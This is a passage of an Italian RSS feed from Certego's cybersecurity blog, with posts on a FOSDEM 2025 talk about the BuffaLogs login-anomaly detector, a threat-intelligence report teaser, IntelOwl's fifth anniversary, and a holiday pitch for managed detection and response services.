&lt;br&gt;</content:encoded></item><item><title><![CDATA[FOSDEM 2025]]></title><description><![CDATA[Certego tra gli speaker dell’evento dedicato al mondo software Open Source]]></description><link>https://www.certego.net/blog/fosdem-2025-certego-tra-gli-speaker-evento-dedicato-al-mondo-software-open-source/</link><guid isPermaLink="false">fosdem-2025-certego-tra-gli-speaker-evento-dedicato-al-mondo-software-open-source</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Sun, 19 Jan 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il 1° febbraio prenderemo parte, in qualità di relatori, all’edizione 2025 del FOSDEM, uno dei principali eventi internazionali dedicati al mondo software Open Source, che si terrà a Bruxelles.&lt;/p&gt;
&lt;p&gt;Federico Foschini e Lorena Goldoni di Certego presenteranno BuffaLogs, la soluzione di Authentication Protection integrata nella nostra piattaforma Panoptikon®, progettata per estendere la capacità di individuare all’origine i login anomali e migliorare le capacità di analisi dei team di Security Operations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://fosdem.org/2025/schedule/event/fosdem-2025-5623-an-overview-on-detecting-login-anomalies-with-buffalogs/&quot;&gt;Link all&apos;evento: clicca qui!&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;BuffaLogs è stato sia rilasciato come software Open Source, sia integrato con successo all’interno della piattaforma MDR Certego PanOptikon®, per estendere la capacità di individuare gli accessi potenzialmente pericolosi sulle infrastrutture dei clienti Certego e migliorare le capacità di analisi del team di Detection and Response.&lt;/p&gt;
&lt;h2&gt;Come funziona?&lt;/h2&gt;
&lt;p&gt;Mediante l&apos;applicazione di logiche di rilevamento specifiche, il sistema esamina ogni singolo accesso registrato su diverse sorgenti, quali firewall, applicazioni web o ambienti cloud. Lo scopo è individuare autenticazioni anomale e generare immediatamente notifiche di allarme.
Per rendere l&apos;applicativo personalizzabile in base alle specifiche esigenze di ogni azienda, BuffaLogs consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Definire un livello di rischio personalizzato per ciascun utente;&lt;/li&gt;
&lt;li&gt;Applicare appositi filtri per escludere specifici accessi dalle attività di rilevamento, sia relativi ai Paesi da cui provengono o da specifici indirizzi IP.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Infine, possono anche essere notificati degli &quot;utenti vip&quot;, con alti privilegi nel sistema, per i quali si desidera dedicare una particolare attenzione.&lt;/p&gt;
&lt;h2&gt;Qual è la caratteristica che lo rende innovativo?&lt;/h2&gt;
&lt;p&gt;Sul mercato sono presenti diverse soluzioni di rilevamento dei login anomali, ma essendo applicativi proprietari, anche se acquistati, forniscono alle organizzazioni o ai team di rilevamento solo alert di tipo generico, senza informazioni di contesto e pochi dettagli.&lt;/p&gt;
&lt;p&gt;A differenza delle soluzioni proprietarie, BuffaLogs si distingue come un&apos;applicazione Open Source con codice sorgente pubblico. Questa particolare caratteristica, unita al fatto che l&apos;applicazione è stata sviluppata internamente da Certego, ci permette di analizzare in modo dettagliato le ragioni per cui un allarme è stato attivato, consultare i dati grezzi circostanti e aggiornare il codice per rispondere alle nuove esigenze emergenti.&lt;/p&gt;
&lt;h2&gt;Scopri tutti i dettagli della soluzione:&lt;/h2&gt;
&lt;br&gt;
    &lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/buffalogs-anomaly-detection-in-login-data/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1510px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAABlUlEQVR42pVRTU/CQBDtbzPRP6A3T4abP8J4UK9eMJEYiHrw+6NgjBYoRZHEGGsUpJULgkCwiNCWim13dusuEEX0oC+zm5mXffsyMxwQgjB2ALtAXMA0BxaklyD8yTCS8dAnaXC24ziYeF18aWBY9lkSj3ThUQ3XqNflajOY15cU/bz2Rs2ZAyGYkJ4VdBNaYo/pvAFwr3WNV6rjQmkiVll5aCHWBXEQcl0XADwqwSwIpr6IlYNiXddN01xWmjNyo9w06aPOu311fR2LCrwgbkRTa0exveRlKCL4dyKrJ8mbUv3m6eW20rCBcKIkHfMHgc19fzielKSLdNpot8WElIieLu5HR+ZXx+ZCowtrI7OByaDg20r71sWpdXF6N/38Dpwsy4c8f3GWTCXiG1vb4XCYTqVQKCiKUiw+ZjN3ufusquTobVmW971tjh7btnXd0A3TMAzaAmv1N1AVZougwAgBmzb9iVKdTqfdhWW1e6vAPzA06r7zX9BTlmvaVVbNPyiZbAa56H/iZqtVLJU0TVNVFQA+ADFyXZijAlbqAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/7414599d100625ccee47a2caf743b23b/68638/cover-buffalogs.png&quot; srcset=&quot;/website/static/7414599d100625ccee47a2caf743b23b/804b2/cover-buffalogs.png 384w,
/website/static/7414599d100625ccee47a2caf743b23b/e5715/cover-buffalogs.png 768w,
/website/static/7414599d100625ccee47a2caf743b23b/68638/cover-buffalogs.png 1510w&quot; sizes=&quot;(max-width: 1510px) 100vw, 1510px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Dicembre 2024]]></description><link>https://www.certego.net/blog/whitepaper-dicembre-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-dicembre-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Sun, 12 Jan 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di dicembre 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[IntelOwl compie gli anni]]></title><description><![CDATA[5 anni di evoluzioni della piattaforma di Threat Intelligence di Certego]]></description><link>https://www.certego.net/blog/intelowl-compie-gli-anni-5-anni-di-evoluzioni-della-piattaforma-di-threat-intelligence-di-certego/</link><guid isPermaLink="false">intelowl-compie-gli-anni-5-anni-di-evoluzioni-della-piattaforma-di-threat-intelligence-di-certego</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 06 Jan 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Quando, all’inizio del 2020, abbiamo dato vita al progetto IntelOwl, eravamo consapevoli delle difficoltà che la comunità di cyber security doveva affrontare per automatizzare le attività di routine legate alla Threat Intelligence. Il nostro obiettivo era andare oltre la semplice aggregazione, classificazione e condivisione di informazioni cruciali — dagli indicatori di compromissione (IoC) all’analisi di vari tipi di osservabili (IP, domini, hash e file) — per semplificare e migliorare il lavoro degli analisti di sicurezza.&lt;/p&gt;
&lt;p&gt;Nel tempo, la versione open source di IntelOwl ha ottenuto un &lt;strong&gt;importante consenso internazionale&lt;/strong&gt;, come dimostrano le quasi 4.000 “star” su GitHub, diventando uno dei principali progetti internazionali di Threat Intelligence sulla piattaforma e continuando a evolversi per sostenere le attività quotidiane degli analisti.&lt;/p&gt;
&lt;p&gt;Nella sua forma più avanzata, &lt;strong&gt;IntelOwl si integra perfettamente nell’ecosistema Certego&lt;/strong&gt; e, grazie alla collaborazione nativa con la piattaforma Certego di Unified Security Operations, PanOptikon®, facilita la gestione e la condivisione di ogni tipo di informazione critica, incrementando l’efficacia dei nostri servizi MDR e accelerando le procedure di analisi e risposta agli incidenti all’interno del Security Operations Center di Certego.&lt;/p&gt;
&lt;p&gt;Dal rilascio precedente a oggi, il nostro lavoro si è focalizzato sul potenziamento e la trasformazione di IntelOwl, che da semplice piattaforma di data extraction è diventata una vera e propria soluzione di &lt;strong&gt;Threat Intelligence Investigation&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;Perché è nato IntelOwl&lt;/h2&gt;
&lt;p&gt;In Certego, &lt;strong&gt;tutte le nostre attività di Managed Detection and Response (MDR) si basano in modo fondamentale sulla Threat Intelligence&lt;/strong&gt;, perché ci consente di anticipare le mosse degli avversari e reagire prima che possano sfruttare le proprie tattiche e vulnerabilità. Da questa esigenza è nata l’idea di creare uno strumento &lt;strong&gt;open source&lt;/strong&gt; in grado di raccogliere in un unico luogo un grande volume di informazioni provenienti da diverse fonti: servizi OSINT, feed di minacce, database reputazionali e molto altro.&lt;/p&gt;
&lt;p&gt;Con IntelOwl, siamo riusciti a costruire una piattaforma affidabile, che aiuta i nostri analisti e gli addetti ai lavori della cybersecurity a estrarre rapidamente dati di qualità, comprendere le potenziali minacce e &lt;strong&gt;adattare in anticipo i sistemi di difesa&lt;/strong&gt;. In questi cinque anni, l’ecosistema del progetto si è evoluto, abbracciando un approccio sempre più &lt;strong&gt;collaborativo&lt;/strong&gt; grazie al sostegno di una vivace community di sviluppatori e ricercatori di sicurezza.&lt;/p&gt;
&lt;h2&gt;Le tappe più importanti&lt;/h2&gt;
&lt;p&gt;Ripercorrendo la storia di IntelOwl, ci sono alcuni momenti che hanno segnato la nostra crescita:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;1- Integrazione con numerose fonti di dati&lt;/h3&gt;
&lt;p&gt;Fin da subito, ci siamo impegnati per garantire l’accesso a quante più fonti di intelligence possibili, offrendo una visione ampia sugli indicatori di compromissione (IoC).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;2- Supporto e collaborazione open source&lt;/h3&gt;
&lt;p&gt;Il progetto è aperto alla community di sviluppatori, ricercatori e analisti di sicurezza, che rappresenta il vero motore dell’innovazione. I contributi di ognuno hanno permesso di correggere rapidamente i bug e di implementare nuove funzionalità.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;3- Crescita della popolarità e adozione enterprise&lt;/h3&gt;
&lt;p&gt;Da progetto sperimentale, IntelOwl si è affermato come soluzione affidabile, adottata da numerose organizzazioni. La nostra piattaforma ha dimostrato di poter scalare sia a livello tecnologico che di integrazione nei processi aziendali&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;IntelOwl v6&lt;/h2&gt;
&lt;p&gt;La sesta versione della piattaforma ha rappresentato un punto di svolta cruciale per il software di Threat Intelligence di Certego. Dall’ultima release ad oggi abbiamo lavorato duramente per potenziare e trasformare IntelOwl da una piattaforma di Data Extraction ad una &lt;strong&gt;Threat Intelligence Investigation Platform&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;L’ultima release di IntelOwl ha apportato un significativo avanzamento con l&apos;integrazione del &lt;strong&gt;framework di indagine&lt;/strong&gt;. Questo strumento consente agli analisti di &lt;strong&gt;condurre indagini dettagliate su più indicatori specifici di compromissione e di collegarli tra loro, fornendo un quadro completo delle attività sospette&lt;/strong&gt;. Grazie a questa funzionalità, gli analisti ora dispongono di una piattaforma unificata per l&apos;aggregazione, l&apos;analisi individuale e la correlazione degli indicatori, facilitando la costruzione di dettagliate mappe investigative.&lt;/p&gt;
&lt;br&gt;
    &lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-spiegato-attraverso-il-calcio/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACkUlEQVR42mVSS09TQRjlR/gHTAxxoQsWJKIIaESRRIguQCFxaXQhIbrBRElMJKLuFB+JlkeIKBLLo0B7lZZHC4Xevkvb297buc/eVgrBRDeymOPcS1y5OPlmMmfOd2bOVyUWFMxwPiyvBTC/4EYkloBeLENWDSha0Ya1NswfCIbCWPWvY2d33+b8O7eg6qbFO6iSiIpl/wZSaQFLvhW7/iNbJM0o2YLlnT3MuRbR0dmJ945hxssyjvG/oLUpMFHLKWEXc5KCnEjsvZArIJ3NIy/JKDKHqUwen50uvHOMwr3IwdDL0LUSNJWJKcahIFF0RKMJ8CEe/BYDH0E4GkcslgQfjiGwHkQ4EsN2JgeRaDAq+9j9fYDNvAAuxmMtwUMwFVR+/mKvKTNB5iqUIfDGRXiiIlaTEhICQXBbQjRLEEpLiGQlZLIiZJlAJ3EEN2Yx6HyOnvGHeOS4i/Y7F9DXdw+pVPqgSmRWvdsaPoUVjIdkzCdUu07wMl4GCEY2ZUxHFahmBZEIj5vtjWitq0ZH8ym0XT6D9vM1aK09hnMnjmB8+I3lsIiPIYIJhrmYbNepiIyvURlOBk9SwUiwgAnW0BXOo6W5CSerj6LhbC3qG2vQdqkBXVdbcOViPcZGHIehqOYO1FLFhsg+WpQNGzJrVmAfnlOKsF6imnsIBNzof3YNvS+6cHvgOh4PdGNwoAv9D26AW5w6DIX7voIFjxczLg4bQR4aG5s0MZAhRTvhPEvdSp7IGnSzhG/BL3gy2o2e103ofVWH+0OncevpcTiX3tpzSOfdS3TB46PTcxxd9W9SWS/RhKTRpKTTTK5AM4JI01mRslGiilqkhrFLU0KScv5J6vR+oLO+MTrJDWEr7v/zF0JFiajDdOlhAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/b23669c7edefedfc63fd8a3f32eff1e7/71c1d/mdr%20spiegato%20attraverso%20il%20calcio.png&quot; srcset=&quot;/website/static/b23669c7edefedfc63fd8a3f32eff1e7/804b2/mdr%20spiegato%20attraverso%20il%20calcio.png 384w,
/website/static/b23669c7edefedfc63fd8a3f32eff1e7/e5715/mdr%20spiegato%20attraverso%20il%20calcio.png 768w,
/website/static/b23669c7edefedfc63fd8a3f32eff1e7/71c1d/mdr%20spiegato%20attraverso%20il%20calcio.png 1536w,
/website/static/b23669c7edefedfc63fd8a3f32eff1e7/a878e/mdr%20spiegato%20attraverso%20il%20calcio.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Uno sguardo al futuro&lt;/h2&gt;
&lt;p&gt;Il nostro impegno non si ferma qui. Puntiamo a far crescere ulteriormente l’ecosistema di IntelOwl, continuando a:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Integrare nuove fonti e strumenti di Intelligenza Artificiale&lt;/h3&gt;
&lt;p&gt;Per restare al passo con le minacce in evoluzione, miriamo a integrare costantemente nuove soluzioni, compresi strumenti di IA che non esistevano quando il progetto ha preso forma. Il nostro obiettivo è offrire una copertura sempre più completa e potenziare il valore delle informazioni di Threat Intelligence.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Coinvolgere la community&lt;/h3&gt;
&lt;p&gt;Siamo convinti che l’interazione con la community sia fondamentale per migliorare e innovare costantemente IntelOwl. Accogliamo suggerimenti e proposte attraverso diversi canali: il nostro repository &lt;a href=&quot;https://github.com/intelowlproject&quot;&gt;GitHub&lt;/a&gt;, &lt;a href=&quot;https://x.com/i/flow/login?redirect_after_login=%2Fintel_owl&quot;&gt;l’account X&lt;/a&gt; e il canale &lt;a href=&quot;https://honeynetpublic.slack.com/?redir=%2Farchives%2FC01KVGMAKL6%3Fname%3DC01KVGMAKL6&quot;&gt;Slack&lt;/a&gt;. Ogni contributo, grande o piccolo, contribuisce a rendere IntelOwl uno strumento sempre più potente.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Rilasciare aggiornamenti periodici&lt;/h3&gt;
&lt;p&gt;A partire dall&apos;ultima release (v6), abbiamo deciso di introdurre un ciclo di aggiornamenti programmati, per assicurare alla community — e a tutti coloro che utilizzano IntelOwl — un flusso costante di novità e migliorie. Questa nuova cadenza di rilascio riflette il nostro impegno a mantenere il software sempre aggiornato, ascoltando i feedback degli utenti e rispondendo rapidamente alle esigenze del panorama della Threat Intelligence.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Grazie per questi cinque anni&lt;/h2&gt;
&lt;p&gt;Il successo e la longevità di IntelOwl sono il risultato della passione con cui il team Certego, i collaboratori open source e l’intera community hanno contribuito al progetto. Grazie a tutti coloro che ci hanno accompagnato fin dall’inizio e a chi ha iniziato a utilizzare IntelOwl più di recente.
Continueremo a mettere la nostra Threat Intelligence al centro dei servizi MDR (Managed Detection and Response), per anticipare le tattiche degli avversari e proteggere le infrastrutture con sempre maggiore efficacia. Rimanete sintonizzati sui nostri canali per non perdervi i prossimi sviluppi: la storia di IntelOwl è ancora tutta da scrivere!&lt;/p&gt;
&lt;h2&gt;Buon compleanno IntelOwl, e che il futuro sia ancora più ricco di successi e innovazioni!&lt;/h2&gt;</content:encoded></item><item><title><![CDATA[Natale al sicuro]]></title><description><![CDATA[Alla cybersecurity della tua azienda ci pensa Certego]]></description><link>https://www.certego.net/blog/natale-al-sicuro-alla-cybersecurity-della-tua-azienda-ci-pensa-certego/</link><guid isPermaLink="false">natale-al-sicuro-alla-cybersecurity-della-tua-azienda-ci-pensa-certego</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 18 Dec 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il periodo delle feste è finalmente arrivato: un momento per rilassarsi, staccare dal lavoro e trascorrere del tempo con i propri cari. Tuttavia, mentre ti concedi un po&apos; di meritato riposo, i cybercriminali non vanno in vacanza. Anzi, proprio i periodi di ferie rappresentano per loro un’opportunità d’oro: meno occhi puntati sulle infrastrutture aziendali e team IT spesso ridotti.&lt;/p&gt;
&lt;p&gt;Sei sicuro che la tua azienda sia protetta mentre ti godi le vacanze? Con un servizio MDR (Managed Detection and Response), un team di esperti qualificati si prende cura della sicurezza della tua infrastruttura aziendale, 24 ore su 24, 7 giorni su 7, anche durante le feste!&lt;/p&gt;
&lt;h2&gt;Perché i cybercriminali colpiscono (anche) durante le festività?&lt;/h2&gt;
&lt;p&gt;Durante i periodi di festività, molte aziende operano con il personale IT ridotto. Questo crea una finestra di opportunità per i malintenzionati che sfruttano vulnerabilità non monitorate o tempi di reazione più lenti per sferrare attacchi. Tra i rischi più comuni:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ransomware -&lt;/strong&gt; attacchi che criptano i dati aziendali, richiedendo un riscatto per il loro rilascio;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Phishing mirato -&lt;/strong&gt; e-mail fraudolente progettate per ingannare i dipendenti meno esperti;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Attacchi DDoS -&lt;/strong&gt; interruzioni dei servizi online fondamentali per il business;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Accessi non autorizzati -&lt;/strong&gt; sfruttando credenziali rubate o vulnerabilità nei sistemi.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;MDR: La protezione continua che non ti lascia mai&lt;/h2&gt;
&lt;p&gt;Un servizio di Managed Detection and Response (MDR) è pensato per assicurarti una protezione costante dei sistemi informatici, indipendentemente dalla presenza del tuo team interno. Anche durante le festività, mentre la tua squadra IT si gode una meritata pausa, l’MDR combina tecnologie di monitoraggio avanzate e competenze specialistiche attive 24/7 per identificare e contenere tempestivamente qualsiasi minaccia, riducendo al minimo gli impatti operativi e garantendo un livello di sicurezza di primo livello.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Monitoraggio 24/7&lt;/h3&gt;
&lt;p&gt;Il team di Security Operations di Certego è composto da specialisti senior con competenze eterogenee e in possesso delle principali certificazioni internazionali. Grazie alla piattaforma proprietaria di Unified Security Operations PanOptikon®, i servizi MDR di Certego assicurano una sorveglianza costante, 24 ore su 24, 7 giorni su 7, sull’intera infrastruttura.&lt;/p&gt;
&lt;p&gt;Integrando sonde e agenti a livello di rete, endpoint e ambienti cloud, PanOptikon® monitora in tempo reale il traffico e rileva qualsiasi comportamento anomalo, inclusa l’analisi dei dati telemetrici provenienti dagli endpoint.&lt;/p&gt;
&lt;p&gt;In caso di un evento sospetto, il team di Security Operations analizza nel dettaglio ogni allarme per comprenderne l’origine, confermarne la natura minacciosa e definire la strategia d’intervento più efficace, per reagire rapidamente, riducendo al minimo la finestra di esposizione alle minacce e garantendo un livello di protezione sempre elevato.&lt;/p&gt;
&lt;br&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-spiegato-attraverso-il-calcio/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACkUlEQVR42mVSS09TQRjlR/gHTAxxoQsWJKIIaESRRIguQCFxaXQhIbrBRElMJKLuFB+JlkeIKBLLo0B7lZZHC4Xevkvb297buc/eVgrBRDeymOPcS1y5OPlmMmfOd2bOVyUWFMxwPiyvBTC/4EYkloBeLENWDSha0Ya1NswfCIbCWPWvY2d33+b8O7eg6qbFO6iSiIpl/wZSaQFLvhW7/iNbJM0o2YLlnT3MuRbR0dmJ945hxssyjvG/oLUpMFHLKWEXc5KCnEjsvZArIJ3NIy/JKDKHqUwen50uvHOMwr3IwdDL0LUSNJWJKcahIFF0RKMJ8CEe/BYDH0E4GkcslgQfjiGwHkQ4EsN2JgeRaDAq+9j9fYDNvAAuxmMtwUMwFVR+/mKvKTNB5iqUIfDGRXiiIlaTEhICQXBbQjRLEEpLiGQlZLIiZJlAJ3EEN2Yx6HyOnvGHeOS4i/Y7F9DXdw+pVPqgSmRWvdsaPoUVjIdkzCdUu07wMl4GCEY2ZUxHFahmBZEIj5vtjWitq0ZH8ym0XT6D9vM1aK09hnMnjmB8+I3lsIiPIYIJhrmYbNepiIyvURlOBk9SwUiwgAnW0BXOo6W5CSerj6LhbC3qG2vQdqkBXVdbcOViPcZGHIehqOYO1FLFhsg+WpQNGzJrVmAfnlOKsF6imnsIBNzof3YNvS+6cHvgOh4PdGNwoAv9D26AW5w6DIX7voIFjxczLg4bQR4aG5s0MZAhRTvhPEvdSp7IGnSzhG/BL3gy2o2e103ofVWH+0OncevpcTiX3tpzSOfdS3TB46PTcxxd9W9SWS/RhKTRpKTTTK5AM4JI01mRslGiilqkhrFLU0KScv5J6vR+oLO+MTrJDWEr7v/zF0JFiajDdOlhAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/b23669c7edefedfc63fd8a3f32eff1e7/71c1d/mdr%20spiegato%20attraverso%20il%20calcio.png&quot; srcset=&quot;/website/static/b23669c7edefedfc63fd8a3f32eff1e7/804b2/mdr%20spiegato%20attraverso%20il%20calcio.png 384w,
/website/static/b23669c7edefedfc63fd8a3f32eff1e7/e5715/mdr%20spiegato%20attraverso%20il%20calcio.png 768w,
/website/static/b23669c7edefedfc63fd8a3f32eff1e7/71c1d/mdr%20spiegato%20attraverso%20il%20calcio.png 1536w,
/website/static/b23669c7edefedfc63fd8a3f32eff1e7/a878e/mdr%20spiegato%20attraverso%20il%20calcio.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Incident Response&lt;/h3&gt;
&lt;p&gt;La capacità di intervenire rapidamente in caso di incidente informatico è un elemento chiave di un servizio MDR efficace. Rilevare un attacco è importante, ma sono la rapidità e la precisione della risposta a fare davvero la differenza nel limitare i danni.&lt;/p&gt;
&lt;p&gt;Le attività di Incident Response richiedono solide competenze tecniche, organizzative e un’esperienza approfondita nella gestione di situazioni critiche. Il Rapid Incident Response Team di Certego, forte di procedure di risposta predefinite — testate e aggiornate e basate sui principali modelli operativi internazionali, come ad esempio il MITRE ATT&amp;#x26;CK Framework — garantisce un approccio strutturato ed efficace nel contenere le minacce e proteggere il business.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Intervento immediato:&lt;/strong&gt; In caso di minaccia rilevata, il team agisce con prontezza per bloccare e neutralizzare l’attacco, minimizzando l’impatto sull’organizzazione;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Riduzione del downtime:&lt;/strong&gt; Una risposta tempestiva assicura la continuità operativa, evitando lunghi fermi e limitando le interruzioni nei processi aziendali;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Analisi post-incidente&lt;/strong&gt; Una volta risolta la situazione, il team esamina nel dettaglio l’evento, anche con l’impiego dell’analisi forense, individuando le cause alla radice e implementando misure preventive per ridurre le possibilità di attacchi simili in futuro.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Managed Detection and Response per un Natale sicuro e sereno&lt;/h2&gt;
&lt;p&gt;Investire in un servizio di Managed Detection &amp;#x26; Response significa garantire una protezione continua per la tua azienda, 24 ore su 24, 7 giorni su 7, anche durante le festività. Il monitoraggio costante e la risposta rapida agli incidenti offrono quella serenità necessaria per goderti le feste senza preoccupazioni, sapendo che la tua azienda è in buone mani.
&lt;strong&gt;Non lasciare che i cybercriminali rovinino il tuo Natale. Affidati ai servizi MDR di Certego e goditi le vacanze con la sicurezza che i tuoi sistemi siano protetti in ogni momento&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
